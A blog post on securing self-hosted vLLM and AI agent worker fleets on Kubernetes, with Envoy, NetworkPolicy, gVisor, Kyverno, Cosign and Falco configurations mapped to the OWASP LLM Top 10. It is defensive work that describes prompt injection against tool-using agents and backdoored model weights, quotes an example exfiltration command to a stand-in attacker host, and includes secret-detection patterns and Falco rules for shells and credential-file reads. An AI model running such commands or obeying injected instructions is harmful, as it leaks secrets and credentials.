> Blog Post

Securing Self-Hosted LLMs and AI Agents on Kubernetes

We shipped two flagship posts in the past two months that, between them, stand up a high-privilege agent fleet inside your cluster — and both deferred the security chapter. The self-hosting guide walks you all the way to a production vLLM deployment, then notes in one sentence near the end that "vLLM does not enforce API keys by default" and moves on. The agent control plane post builds a worker fleet that runs model-inference tasks against your in-cluster models, with guardrails that cap recursion depth (MAX_DEPTH) and a per-goal token budget. The obvious next step — and where most teams take it — is to let those workers execute agent-chosen tools (shell, code, HTTP, DB), which is exactly the move that turns a model-inference pool into a high-privilege attack surface. Neither post addresses adversarial input. Neither bounds the blast radius of a tool an agent decides to call.

That was a deliberate scoping decision at the time, and it leaves a gap that is now load-bearing. Self-hosting and agents do not just save money (the hybrid AI playbook makes the cost case) — they move the security boundary inside your cluster. The model that used to be a third party's problem now runs on your GPUs. The agent that used to be a chat window now has a worker pod that can run arbitrary code and reach your internal network. The agent fleet is a new, high-privilege attack surface, and the container-security baseline we wrote about earlier — image scanning, runtime detection, admission policy — does not cover it. Those tools secure the substrate. They say nothing about prompt injection, tool blast radius, or whether the weights you loaded were tampered with.

This post is the security extension those two posts assumed. It does not rebuild the vLLM Deployment and Service manifests, the GPU node pools, taints and tolerations, the device plugin, or KEDA autoscaling — the self-hosting guide owns that. It does not re-derive the task-ledger, Redis Streams, lane-routing, or NEED:-escalation architecture, or the recursion and cost guardrails — the agent post owns that. It treats both as the substrate to secure, and adds the auth, sandboxing, guardrail, secrets, supply-chain, and incident-response controls that turn "we deployed it" into "we can run it against internal data and systems."

It is also the AI-specific follow-on to the container-security post. We will reuse the same Trivy, Falco, and Kyverno you already run — not re-teach them — and point them at threats those tools were never configured for.

The Agent Stack Threat Model, Mapped to the OWASP LLM Top 10

Vague warnings about "AI risk" are useless for prioritization. The OWASP LLM Top 10 (2025) gives the agentic threat surface named, current categories, so a threat model reads as concrete risk rather than hand-waving. Here is the map for the stack the two flagship posts built.

OWASP risk What it means for this stack The vulnerable component
LLM01 Prompt Injection Untrusted content steers an agent into actions you never sanctioned The worker that turns model output into shell/HTTP/DB calls
LLM02 Sensitive Information Disclosure A tool's output leaks secrets, PII, or internal data back through the model Tool results written to the task ledger and prompts
LLM03 Supply Chain A poisoned or backdoored model is loaded and trusted The GGUF/safetensors artifact pulled from a registry or Hugging Face
LLM06 Excessive Agency An agent has tools whose side effects exceed what any task should be able to do The worker fleet's tool set (shell, code exec, DB writes)
LLM10 Unbounded Consumption An unauthenticated endpoint is hammered for cost or denial of service The vLLM Service, which enforces no auth by default

Translate that into the architecture and the picture is sharp. The vLLM inference endpoint is a ClusterIP Service that any pod in the cluster can hit, with no key, no quota, and no per-caller accounting (LLM10). The worker fleet is a confused deputy: it holds the privileges to run real actions, and it executes whatever the model emits — so an injection that reaches it (LLM01) inherits those privileges and becomes excessive agency (LLM06). Secrets reachable from a compromised worker are exfiltration targets (LLM02). And the model artifact itself, pulled from a registry or Hugging Face, is trusted on faith (LLM03).

What does the container-security baseline already handle? Trivy scans the worker and vLLM images for known CVEs. Falco watches syscalls at runtime. Kyverno enforces pod-spec policy at admission — non-root, resource limits, no latest tags. Those are real and necessary, and the rest of this post assumes they are running. But none of them know what a prompt is, what a tool call is, or whether a .safetensors file is the one you signed. Everything below is net-new application of those same primitives to AI-specific threats.

One distinction to hold onto throughout, because the two are easy to conflate. The agent post's guardrails — MAX_DEPTH, task ceilings, token budgets — are recursion and cost guardrails: they stop a goal from spinning forever or running up a surprise bill. They are not security controls. They will happily let a perfectly in-budget, three-level-deep task curl your secrets to an attacker. This post adds a different class: adversarial-input and blast-radius guardrails, which assume the model output is hostile and bound what it can actually do. Both belong in the control plane. They solve different problems.

Lock Down the Inference Endpoint: Auth, Authz, and Rate Limiting in Front of vLLM

Start with the one-sentence TODO from the self-hosting post, because it is the cheapest gap to close and the one an attacker reaches first. vLLM's OpenAI-compatible server can take a --api-key, but a single shared static key gives you no per-caller identity, no per-tenant quota, and no rotation story. The fix is a thin authz boundary in front of the model Service: a gateway that proves who is calling, whether they may, and how much before a request ever reaches the GPU.

To be clear about what this is and is not: the self-hosting post described a routing gateway that picks a backend by the model field. This is a different gateway with a different job — it is the authz envelope, not the request router. You can run both; in many deployments the auth gateway sits in front of the routing gateway. We are not rebuilding the routing layer or the Deployment behind it here.

We run the gateway as a standalone Envoy Deployment (labeled app: vllm-auth-gateway) that proxies over the network to the vLLM Service, rather than a sidecar inside the vLLM pod. The reason is enforceability: a sidecar reaches vLLM over pod loopback, which NetworkPolicy cannot govern, so there is no way to prove the gateway is the only path to the model. A separate gateway pod lets a default-deny NetworkPolicy on vLLM admit traffic from exactly one source. The principle: verify a JWT (per-agent or per-tenant identity from your existing OIDC issuer), enforce a request-rate limit, cap request size, and only then proxy to vLLM.

# envoy-auth-gateway.yaml — Envoy config for a standalone auth + rate-limit
# gateway Deployment (app: vllm-auth-gateway). It listens on :8443 and proxies
# to the vLLM ClusterIP Service (vllm.inference.svc.cluster.local:8000).
static_resources:
  listeners:
    - name: ingress
      address:
        socket_address: { address: 0.0.0.0, port_value: 8443 }
      filter_chains:
        - filters:
            - name: envoy.filters.network.http_connection_manager
              typed_config:
                "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
                stat_prefix: vllm_ingress
                route_config:
                  virtual_hosts:
                    - name: vllm
                      domains: ["*"]
                      routes:
                        - match: { prefix: "/" }
                          route: { cluster: vllm_upstream }
                http_filters:
                  # 1. Verify per-agent/per-tenant JWT from your OIDC issuer.
                  - name: envoy.filters.http.jwt_authn
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.jwt_authn.v3.JwtAuthentication
                      providers:
                        agent_idp:
                          issuer: https://idp.internal/agents
                          remote_jwks:
                            http_uri:
                              uri: https://idp.internal/agents/.well-known/jwks.json
                              cluster: idp
                              timeout: 5s
                            cache_duration: { seconds: 600 }
                          forward_payload_header: x-agent-identity
                      rules:
                        - match: { prefix: "/v1" }
                          requires: { provider_name: agent_idp }
                  # 2. Buffer the request body so a single oversized prompt
                  #    cannot soak a GPU slot (see max_request_bytes below).
                  - name: envoy.filters.http.buffer
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.buffer.v3.Buffer
                      max_request_bytes: 2097152          # 2 MiB request-body cap
                  # 3. Global per-replica request rate limit (token bucket).
                  #    Per-caller token budgeting is enforced one layer up — see below.
                  - name: envoy.filters.http.local_ratelimit
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.local_ratelimit.v3.LocalRateLimit
                      stat_prefix: vllm_rl
                      token_bucket:
                        max_tokens: 60
                        tokens_per_fill: 60
                        fill_interval: { seconds: 60 }    # 60 req/min/replica
                      filter_enabled:
                        default_value: { numerator: 100, denominator: HUNDRED }
                      filter_enforced:
                        default_value: { numerator: 100, denominator: HUNDRED }
                  - name: envoy.filters.http.router
                    typed_config:
                      "@type": type.googleapis.com/envoy.extensions.filters.http.router.v3.Router
  clusters:
    # The vLLM ClusterIP Service the gateway proxies to.
    - name: vllm_upstream
      connect_timeout: 5s
      type: STRICT_DNS
      load_assignment:
        cluster_name: vllm_upstream
        endpoints:
          - lb_endpoints:
              - endpoint:
                  address:
                    socket_address:
                      address: vllm.inference.svc.cluster.local
                      port_value: 8000
    # The OIDC issuer, used by jwt_authn to fetch JWKS over TLS.
    - name: idp
      connect_timeout: 5s
      type: STRICT_DNS
      load_assignment:
        cluster_name: idp
        endpoints:
          - lb_endpoints:
              - endpoint:
                  address:
                    socket_address: { address: idp.internal, port_value: 443 }
      transport_socket:
        name: envoy.transport_sockets.tls
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.transport_sockets.tls.v3.UpstreamTlsContext
          sni: idp.internal

Note the idp cluster: jwt_authn fetches JWKS through an Envoy upstream cluster, so the provider's remote_jwks.http_uri.cluster: idp must resolve to a defined cluster or Envoy refuses to start. The Buffer HTTP filter (envoy.filters.http.buffer) is what enforces the request-size cap via max_request_bytes — it is a distinct http_filter, not a property of the connection manager, so it has to appear in the http_filters list as shown.

The global token bucket above is a per-replica request-rate limit, not a per-caller control — it bounds total requests on the route regardless of identity. The real LLM10 control, a token budget keyed on caller, is best enforced one layer up, because it requires reading the max_tokens field and accumulating per-key spend. A small middleware (or the auth gateway's own logic) that tracks tokens against a Redis counter keyed on x-agent-identity bounds cost-based DoS in a way a request-rate limit alone cannot. If you want Envoy itself to key the rate limit on identity, add descriptors to the LocalRateLimit filter and a route-level rate_limits action that derives a descriptor entry from the x-agent-identity header.

The control that makes all of this enforceable rather than advisory is a default-deny NetworkPolicy on vLLM. Without it, an attacker simply bypasses the gateway and hits the ClusterIP directly. Only the gateway pod may reach vLLM; the worker fleet reaches the model through the gateway.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: vllm-ingress-gateway-only
  namespace: inference
spec:
  podSelector:
    matchLabels: { app: vllm }
  policyTypes: [Ingress]
  ingress:
    - from:
        - namespaceSelector:
            matchLabels: { kubernetes.io/metadata.name: inference }
          podSelector:
            matchLabels: { app: vllm-auth-gateway }
      ports:
        - { protocol: TCP, port: 8000 }

Now identity is proven, spend is bounded, and there is exactly one authenticated path to the model.

Sandboxing Agent Tool Execution

This is the core of the post. The inference endpoint is a door; the worker pool is the room with everything valuable in it. Worker pods run agent-chosen actions — and per the threat model, a worker is a confused deputy that will execute whatever the model emits. The only safe operating assumption is that the code running inside a worker pod is hostile by default. Design the pod so that even when the agent is fully compromised, the blast radius is the pod and nothing more.

A note on scope before the manifests: this sandboxed pool is the tool-execution worker, not the inference worker. Inference stays in the vLLM pods behind the gateway, so the tool-execution pod needs no GPU — it requests CPU and memory only. That matters because gVisor (runsc) GPU passthrough requires nvproxy and is not broadly production-ready; GPU-bearing pods should not run under gVisor without it. Keep the GPU inference pods on their normal runtime and sandbox only the non-GPU tool-execution pool this way.

That pool needs kernel-level isolation, a hardened security context, no egress, ephemeral workspaces, and admission policy that rejects any worker that does not meet the bar.

Kernel-level isolation with a sandboxed runtimeClass

A standard container shares the host kernel. An agent that executes attacker-chosen code is exactly the workload you do not want sharing a kernel with the rest of the node. Run the tool-execution pool under gVisor (or Kata Containers, if you need full VM isolation) via a dedicated RuntimeClass, so syscalls go through a user-space kernel rather than directly to the host.

apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc            # gVisor's runsc, registered with containerd
scheduling:
  nodeSelector:
    sandbox.gke.io/runtime: gvisor   # schedule onto sandbox-capable nodes

The worker Deployment then opts in with runtimeClassName: gvisor. gVisor intercepts and reimplements the syscall surface in user space, so a kernel-exploit-grade escape from inside the sandbox does not land directly on the host. The tradeoff is real overhead, which we cover at the end — but for the one pool in your cluster that runs arbitrary model-chosen code, it is the control that matters most.

Hardened security context

Sandboxed or not, the worker pod should hold no privilege it does not need: non-root, all capabilities dropped, read-only root filesystem with writable scratch and tmp dirs, a seccomp profile, and no privilege escalation.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: local-agent-worker
  namespace: agents
spec:
  selector:
    matchLabels: { app: local-agent-worker }
  template:
    metadata:
      labels: { app: local-agent-worker }
    spec:
      runtimeClassName: gvisor
      automountServiceAccountToken: false   # no ambient API access
      securityContext:
        runAsNonRoot: true
        runAsUser: 65532
        seccompProfile: { type: RuntimeDefault }
      containers:
        - name: worker
          image: registry.internal/agent-worker:1.4.2
          env:
            - { name: TMPDIR, value: /tmp }   # runtimes/subprocesses write here
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            capabilities: { drop: ["ALL"] }
          volumeMounts:
            - { name: scratch, mountPath: /workspace }   # per-task ephemeral
            - { name: tmp, mountPath: /tmp }             # writable /tmp on read-only root
          resources:
            requests: { cpu: "1", memory: "2Gi" }
            limits:   { cpu: "2", memory: "4Gi" }
      volumes:
        - name: scratch
          emptyDir: { medium: Memory, sizeLimit: 1Gi }   # vanishes with the pod
        - name: tmp
          emptyDir: { medium: Memory, sizeLimit: 256Mi } # bounded scratch for tooling

The emptyDir scratch volume is the per-task ephemeral workspace: nothing an agent writes persists past the pod's life, so one task cannot leave a payload for the next. The second emptyDir mounted at /tmp is what keeps a read-only root filesystem from breaking real tool execution — most language runtimes and subprocess tools write to /tmp, and on a read-only root they would otherwise fail. Pair this with a short-lived worker that handles one task (or a small batch) and exits, and you get clean state between units of work for free.

Default-deny egress

A hardened, sandboxed pod that can still open arbitrary outbound connections can still phone home, exfiltrate data, or pivot to internal services. The single highest-leverage control on the worker pool is a default-deny egress NetworkPolicy with a narrow allowlist — DNS, the auth gateway (to reach the model), the task ledger (Postgres), and Redis. Nothing else.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: worker-egress-allowlist
  namespace: agents
spec:
  podSelector:
    matchLabels: { app: local-agent-worker }
  policyTypes: [Egress]
  egress:
    - to:                                   # DNS only, to kube-dns
        - namespaceSelector:
            matchLabels: { kubernetes.io/metadata.name: kube-system }
          podSelector:
            matchLabels: { k8s-app: kube-dns }
      ports: [{ protocol: UDP, port: 53 }, { protocol: TCP, port: 53 }]
    - to:                                   # the vLLM auth gateway
        - namespaceSelector:
            matchLabels: { kubernetes.io/metadata.name: inference }
          podSelector:
            matchLabels: { app: vllm-auth-gateway }
      ports: [{ protocol: TCP, port: 8443 }]
    - to:                                   # the task ledger (Postgres)
        - podSelector:
            matchLabels: { app: ledger }
      ports: [{ protocol: TCP, port: 5432 }]
    - to:                                   # Redis (dispatch streams)
        - podSelector:
            matchLabels: { app: redis }
      ports: [{ protocol: TCP, port: 6379 }]

Postgres and Redis are separate pods with separate labels, so they need separate egress entries — one podSelector: {app: ledger} on 5432 and one podSelector: {app: redis} on 6379. Match these to the labels your own ledger and Redis deployments actually use. If a task genuinely needs to reach an external HTTP API, route it through an explicit, audited forward proxy with its own allowlist — never punch a hole in this policy. An injected agent that wants to curl https://attacker.example/$(cat /secret) simply gets a connection refused.

Enforce it at admission with Kyverno

Manifests drift. A new worker variant ships without the security context, or someone removes the runtimeClassName to debug a problem and forgets to put it back. The control that prevents that is a Kyverno policy on the agents namespace that rejects any worker pod missing the sandbox spec — reusing the Kyverno install you already run from the container-security post, not a new tool.

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-worker-sandbox
spec:
  validationFailureAction: Enforce
  rules:
    - name: agents-workers-must-be-sandboxed
      match:
        any:
          - resources:
              kinds: [Pod]
              namespaces: [agents]
              selector:
                matchLabels: { app: local-agent-worker }
      validate:
        message: >-
          Agent worker pods must run under the gvisor runtimeClass, as
          non-root with no privilege escalation, a read-only root fs,
          all capabilities dropped, and no automounted SA token.
        pattern:
          spec:
            runtimeClassName: gvisor
            automountServiceAccountToken: false
            =(securityContext):
              runAsNonRoot: true
            containers:
              - securityContext:
                  allowPrivilegeEscalation: false
                  readOnlyRootFilesystem: true
                  capabilities:
                    drop: ["ALL"]

Every worker pod that does not meet the sandbox spec is now rejected before it starts. This is what extending the agent post's local worker pool into a tool-execution pool must actually look like to be safe to run.

Prompt Injection and Output Guardrails as a Middleware Layer

Sandboxing bounds what a compromised worker can do. Guardrails reduce how often it gets compromised in the first place — and, just as importantly, constrain what the agent is allowed to ask for even when it is behaving. Treat this as a dispatch-path concern, not prompt hygiene. The right mental model is middleware that sits between the model and any tool dispatch, in the control plane, on the same path as the lane routing and NEED: escalation from the agent post — not a filter bolted onto the side.

There are three checkpoints.

Input screening, before a task reaches a tool-capable agent. Run injection and jailbreak heuristics plus a small classifier over untrusted content (the document being audited, the fetched web page, the user-supplied spec) before it is handed to an agent that can call tools. The durable principle here is a boundary, not a filter: untrusted content is data, never instructions. Keep retrieved or user-supplied text in clearly delimited data fields, and instruct the agent that nothing inside those fields may change its task or its tool choices.

Output validation, before any tool runs. This is where the control plane earns its keep. The agent's proposed action is validated against a JSON schema and an allowlist of sanctioned, typed tools before the dispatcher executes anything. PII and secret detection runs over both the proposed arguments and the tool's output. The agent cannot invoke an arbitrary command — it can only emit a typed request for one of a fixed set of actions, and anything off-allowlist is rejected.

// Guardrail middleware on the dispatch path, between model output and tool exec.
import { z } from "zod";

// The agent may ONLY request these typed actions. Everything else is rejected.
const ToolCall = z.discriminatedUnion("tool", [
  z.object({ tool: z.literal("read_file"),  path: z.string().regex(/^\/workspace\//) }),
  z.object({ tool: z.literal("write_file"), path: z.string().regex(/^\/workspace\//),
             content: z.string().max(256_000) }),
  z.object({ tool: z.literal("http_get"),   url: z.string().url() }),
  z.object({ tool: z.literal("db_query"),   sql: z.string(), readonly: z.literal(true) }),
]);

const SECRET_PATTERNS = [
  /sk-ant-(?:api|admin)[0-9]{2}-[A-Za-z0-9_-]{80,}/, // Anthropic-style key prefix (heuristic)
  /AKIA[0-9A-Z]{16}/,                                 // AWS access key ids
  /-----BEGIN (?:RSA |EC )?PRIVATE KEY-----/,
];

const HIGH_BLAST_RADIUS = new Set(["write_file", "http_get", "db_query"]);

export async function screenAction(
  raw: unknown,
  ctx: { goalId: string; taskId: string; allowedHosts: string[] },
): Promise<{ allow: boolean; reason?: string; call?: z.infer<typeof ToolCall> }> {
  // 1. Schema + allowlist: only sanctioned, typed tools survive parsing.
  const parsed = ToolCall.safeParse(raw);
  if (!parsed.success) return { allow: false, reason: "off-allowlist or malformed action" };
  const call = parsed.data;

  // 2. Egress allowlist mirrored at the app layer (defense in depth vs. SSRF).
  if (call.tool === "http_get") {
    const host = new URL(call.url).hostname;
    if (!ctx.allowedHosts.includes(host)) return { allow: false, reason: `host ${host} not allowed` };
  }

  // 3. Secret/PII scan on the serialized action before it can run.
  const blob = JSON.stringify(call);
  if (SECRET_PATTERNS.some((re) => re.test(blob)))
    return { allow: false, reason: "secret material in proposed action" };

  // 4. High-blast-radius actions require a second-stage check (below).
  if (HIGH_BLAST_RADIUS.has(call.tool)) {
    const verdict = await secondStageReview(call, ctx);
    if (!verdict.allow) return verdict;
  }
  return { allow: true, call };
}

A second check for high-blast-radius actions. DB writes, external HTTP, and code execution warrant either a human approval step or a second model screening the action. If you use a second model as a judge, treat its verdict with the same skepticism you would any LLM output: apply the standard LLM-as-judge bias mitigations — present options in randomized order, require a structured score rather than free text, and calibrate the threshold against a labeled set — so the security check itself is trustworthy and not just another model you are taking on faith.

Be honest about the failure modes, because the danger here is false confidence. An input classifier is not a complete defense; injection techniques evolve faster than any single classifier. A guardrail that catches 95% of attacks while making the team feel fully protected can be worse than no guardrail, because it lowers vigilance on the 5%. The durable line of defense is the data/instruction boundary and the typed-action allowlist — the structural controls that hold regardless of how clever the injection is — not any one filter. Filters reduce volume; structure bounds outcomes.

This is also where two threads in this blog meet and stay distinct. These security guardrails decide if an action is allowed to run. The eval harness we will cover in a future post decides whether a local model's result is trustworthy enough to act on — a quality signal, not a permission. They reinforce each other and share the task ledger as their substrate, but they answer different questions, and conflating them gets you a system that runs untrustworthy work safely, or trustworthy work dangerously.

Secrets and Least Privilege for Agent Tasks

A compromised or injected agent inherits whatever credentials its worker can read. If those credentials are long-lived and broadly scoped — a database superuser, a cloud admin role, a static API key with no expiry — then a single successful injection is a full breach. The defense is to ensure there is almost nothing worth stealing in the pod, and what little there is expires fast and is scoped to one task.

Mint short-lived, task-scoped tokens per task and project them at runtime. Use ServiceAccount token projection (with an audience bound to exactly the service the task needs) or an external secrets operator that issues a credential scoped to the task's lane and expiring in minutes — never baked into the image, never a static env var, never broader than the one task requires.

# Projected, audience-bound, short-TTL token mounted only for the task's needs.
volumes:
  - name: ledger-token
    projected:
      sources:
        - serviceAccountToken:
            audience: ledger.agents.svc        # usable ONLY against the ledger
            expirationSeconds: 600              # 10-minute TTL, auto-rotated
            path: token

Note what is not here: no cluster secrets mounted into the sandboxed worker, and automountServiceAccountToken: false on the pod so there is no ambient API access. Combine that with the secret-scanning from the guardrail layer — which blocks secret material from appearing in prompts or tool output — and the default-deny egress policy, and you have defense in depth against exfiltration: a credential that should not be in a prompt is caught on the way out, and even if it slips past, there is nowhere to send it.

Finally, every privileged tool call is audit-logged against the durable task ledger the agent post already runs. Each credential use is then attributable to a specific task and goal, which is exactly what you need when you are reconstructing an incident — covered below.

Signing and Verifying Model Weights

The model supply chain is OWASP LLM03, and it is the threat that is easiest to forget because the artifact looks inert. It is not. A .safetensors or GGUF file is code-adjacent: it can be backdoored to behave normally on your evals and maliciously on a trigger phrase, and a tampered file pulled from a public mirror is a realistic supply-chain attack. You do not want to load weights you cannot prove are the ones you vetted.

Sign the model artifact with Cosign. If you package weights as an OCI artifact (the cleanest path on Kubernetes), sign the image and attach a provenance attestation recording source, license, and hash.

# Sign the OCI artifact that carries the weights (keyless, via Sigstore/Fulcio).
cosign sign --yes registry.internal/models/qwen2.5-coder-32b@sha256:<digest>

# Attach an SBOM-style provenance attestation: where it came from, license, hash.
cosign attest --yes --type custom \
  --predicate model-provenance.json \
  registry.internal/models/qwen2.5-coder-32b@sha256:<digest>

Then enforce it at admission with Kyverno's verifyImages — the same admission pattern from the container-security post, applied to a new class of artifact. Worth stating plainly: the container-security post has no Cosign or verifyImages content, so this is genuinely net-new, not a restatement. Unsigned or tampered weights cannot be pulled.

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: verify-model-artifacts
spec:
  validationFailureAction: Enforce
  webhookTimeoutSeconds: 30
  rules:
    - name: model-images-must-be-signed
      match:
        any:
          - resources:
              kinds: [Pod]
              namespaces: [inference]
      verifyImages:
        - imageReferences:
            - "registry.internal/models/*"
          attestors:
            - entries:
                - keyless:
                    issuer: "https://token.actions.githubusercontent.com"
                    subject: "https://github.com/your-org/model-pipeline/*"
                    rekor:
                      url: https://rekor.sigstore.dev

For gated models pulled directly from Hugging Face — where you do not control a signing pipeline — verifying registry signatures is not an option. Fall back to download-integrity verification against published hashes at pod startup, in an init container that fails the pod if the digest does not match.

# init container: verify each weight shard against a pinned, expected sha256.
set -euo pipefail
while read -r expected file; do
  echo "${expected}  /models/${file}" | sha256sum -c - \
    || { echo "INTEGRITY FAILURE: ${file}"; exit 1; }
done < /config/expected-hashes.txt
echo "all model shards verified"

It is weaker than a real signature — you are trusting the hash list you pinned — but it closes the "silently swapped weights" gap where registry signing is unavailable, and it is a concrete addendum rather than a hand-wave.

Observability and Incident Response for the Fleet

The agent post wires in operational observability — traces, queue depth, cost per goal — but says nothing about security-event detection inside a worker. That is the real gap, and it is a security problem as much as an operational one: you cannot respond to an injection you cannot see. Close it with the Falco you already run, tuned for agent-worker behavior rather than re-introduced from scratch.

Inside a tool sandbox, certain things should essentially never happen: an unexpected shell, an outbound connection the egress policy somehow allowed, a read of a file outside /workspace. Those are exactly the signals of a successful injection, and Falco can fire on them.

# Custom Falco rules for the agent worker pool (loaded via falco_rules.local.yaml).
- rule: Unexpected shell in agent worker
  desc: A shell was spawned inside a sandboxed agent worker — likely injection.
  condition: >
    spawned_process and container
    and k8s.ns.name = "agents"
    and proc.name in (sh, bash, zsh, dash, ash)
    and not proc.pname in (agent-worker)
  output: >
    Shell spawned in agent worker (task=%proc.env[TASK_ID]
    cmd=%proc.cmdline pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [agent, injection, mitre_execution]

- rule: Agent worker read outside workspace
  desc: A worker read a sensitive path it has no business touching.
  condition: >
    open_read and container
    and k8s.ns.name = "agents"
    and (fd.name startswith /var/run/secrets
         or fd.name startswith /etc/kubernetes
         or fd.name = /etc/shadow)
  output: >
    Agent worker read sensitive path (file=%fd.name
    task=%proc.env[TASK_ID] pod=%k8s.pod.name)
  priority: CRITICAL
  tags: [agent, exfiltration]

Pair those runtime signals with per-task audit trails on the durable task ledger, so any privileged action is always traceable to a goal and a task. When a single goal goes rogue, the response is rotate, revoke, replay: revoke the task's scoped token (the 10-minute TTL means it expires on its own shortly anyway), kill the ephemeral workspace by deleting the worker pod (the emptyDir goes with it), and use the ledger's replayability to reconstruct exactly which tasks ran, which tools they called, and what the agent did — because every action is already a structured row tied to a goalId and taskId.

A short note for decision-makers, since these controls are not free. gVisor or Kata add per-syscall overhead — typically single-digit to low-double-digit percent on I/O-heavy work, less on compute-bound tasks. The auth gateway adds a small, fixed latency per request (low single-digit milliseconds for JWT verification and rate-limiting). The guardrail classifier adds an inference call on the dispatch path, which is the most visible cost and the one to size deliberately — a small, fast classifier, not a frontier model. None of this is a reason to skip the controls. It is the price of running a high-privilege agent fleet against real data, and it is far cheaper than the incident it prevents.

A Minimal AI-Security Baseline

If you already deployed the stack from the two flagship posts, you can retrofit these controls without a rebuild. Here is the checklist, ordered by leverage, mirroring the container-security post's baseline — each item mapped back to the OWASP risk it addresses, so this reads as a threat-driven control set rather than a grab-bag.

# Control Closes Where it lives
1 Gateway auth + per-key rate/token limit on every inference endpoint LLM10 Standalone Envoy auth gateway in front of vLLM
2 Default-deny egress on worker pods, narrow allowlist LLM01, LLM02, LLM06 NetworkPolicy on agents
3 Sandboxed runtimeClass (gVisor/Kata) for tool execution LLM06 RuntimeClass + worker Deployment
4 Guardrail middleware before tool dispatch (typed allowlist, secret scan, 2nd-stage check) LLM01, LLM02, LLM06 Control-plane dispatch path
5 Per-task scoped, short-TTL secrets; no static creds, no SA automount LLM02, LLM06 Projected SA tokens / external secrets
6 Kyverno verifyImages on model artifacts (+ HF hash check) LLM03 Admission policy, reusing Kyverno
7 Agent-tuned Falco rules + ledger audit trails LLM01, LLM02 Reusing the existing Falco install

Start at the top. Items 1 and 2 close the largest gaps for the least effort — an afternoon each — and item 3 is the structural control that makes the worst case survivable.

The Bottom Line

Self-hosting and agents are worth it: they move execution off the per-token meter and onto hardware you own, and they let you point real intelligence at internal data that can never leave your network. But the same move that captures that value also moves the security boundary inside your cluster. The model is now your code. The agent is now a process with hands. The two flagship posts built that capability and, by their own admission, deferred the controls that make it safe to run. This post is those controls.

None of it is exotic. It is the security primitives you already have — NetworkPolicy, securityContext, RuntimeClass, Kyverno, Falco — pointed at AI-specific threats, plus a thin auth gateway, a guardrail middleware on the dispatch path, and Cosign on your weights. The discipline is what is hard: treat every worker as hostile, keep untrusted content as data, give each task the least privilege that expires the fastest, verify what you load, and watch what runs.

Read this alongside the surrounding stack it stitches together: the self-hosting guide for the inference layer this secures, the agent control plane post for the fleet it hardens, the container-security post for the baseline it extends, and the hybrid AI playbook for the cost thesis that made local execution worth doing in the first place. An eval harness — the quality signal that complements these controls — is coming next: security decides if an action runs; eval decides whether its result is worth trusting. Together they are what turn a clever demo into something you can run in production against the systems that matter.